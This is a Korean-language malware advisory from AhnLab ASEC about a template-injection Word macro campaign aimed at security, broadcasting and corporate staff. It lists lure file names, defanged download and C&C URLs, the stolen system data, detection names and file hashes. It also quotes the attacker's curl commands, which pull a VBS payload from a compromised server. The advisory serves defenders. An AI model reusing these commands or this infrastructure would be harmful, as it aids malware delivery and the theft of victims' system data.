ASEC 분석팀은 최근 <원고 청탁서로 위장한 악성코드 (안보 분야 종사자 대상)>에서 소개한 악성코드가 안보 분야 뿐만 아니라 방송 및 일반 기업들을 타겟으로 유포 중임을 확인하였다. 해당 악성 문서들은 모두 위 블로그 글에서 소개한 악성코드와 동일하게 템플릿 인젝션(Template Injection) 기법을 사용하고 있으며 악성 워드 매크로 문서를 다운로드 받아 실행한다. 확인된 유포 파일명은 다음과 같다.
- [kbs 일요진단]질문지.docx
- 임** 자기소개서.docx
- app-planning – copy.docx

공격자는 악성 매크로 코드가 실행될 수 있도록 매크로 실행을 유도하는 이미지를 사용하였다. 해당 이미지는 과거부터 꾸준히 사용하고 있으며 모두 동일한 공격자로 추정된다.


추가 확인된 악성 워드 매크로 문서 다운로드 URL은 다음과 같다.
- hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm
- hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm
- hxxp://jooshineng[.]com/gnuboard4/adm/img/ghp/up/state.dotm
- hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm
- hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm
다운로드 받은 문서 파일에 포함된 악성 매크로가 실행되면 curl 명령어가 포함된 version.bat 파일을 생성 및 실행한다. 배치 파일에는 정상 문서와 추가 악성 스크립트를 다운로드 및 실행하는 코드가 존재한다. 사용된 curl 명령어는 다음과 같다.
- curl -o “”” & fname & “”” hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/state.docx
- curl -o %temp%\temp.vbs hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60
확인된 정상 문서는 다음과 같이 자기소개서, 어플 제안서 등으로 위장하였다.



추가 악성 스크립트의 경우 기존과 동일하게 아래 정보들을 C&C 서버로 유출한다.
- 감염 PC 시스템 정보
- 시스템에 설치된 바이러스 백신 정보
- 최근 열어본 워드 문서 목록
- 시스템 내 다운로드 폴더 경로 정보
- 실행중인 프로세스 정보
- IE 관련 레지스트리키 수정
- C&C 서버 연결 지속성을 위한 작업 스케줄러 등록
확인된 C&C 서버는 다음과 같다.
- hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/show.php
- hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/show.php
- hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/show.php
최근 대북 관련 인사를 대상으로 하는 악성코드가 일반 기업 사용자에게도 유포되고 있어 사용자의 각별한 주의가 필요하다. 발신인을 알 수 없는 메일의 첨부파일 열람을 자제하고 오피스 문서에 포함된 매크로가 자동으로 실행되지 않도록 주의해야 한다.
[파일 진단]
- Downloader/DOC.External (2023.02.03.03)
- Downloader/DOC.Kimsuky (2023.02.07.00)
[IOC]
- 55a46a2415d18093abcd59a0bf33d0a9 (docx)
- 3cdf9f829ed03e1ac17b72b636d84d0b (dotm)
- 873b2b0656ee9f6912390b5abc32b276 (dotm)
- 83b4d96fc75f74bb589c28e8a9eddbbf (dotm)
- 705ef00224f3f7b02e29f21eb6e10d02 (dotm)
- hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm
- hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm
- hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm
- hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm
- hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보